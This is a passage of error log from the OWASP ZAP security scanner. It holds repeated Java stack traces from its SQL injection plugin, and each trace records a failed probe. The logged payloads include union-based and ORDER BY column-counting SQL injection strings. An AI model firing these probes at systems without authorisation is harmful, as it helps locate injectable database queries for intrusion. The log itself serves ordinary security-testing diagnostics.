org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685675 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685676 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685677 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685678 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' ORDER BY 6803#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685680 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685681 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685683 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685684 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685685 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685686 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685687 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685689 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685690 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685692 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685694 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685695 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP ORDER BY 8251#] due to an I/O error 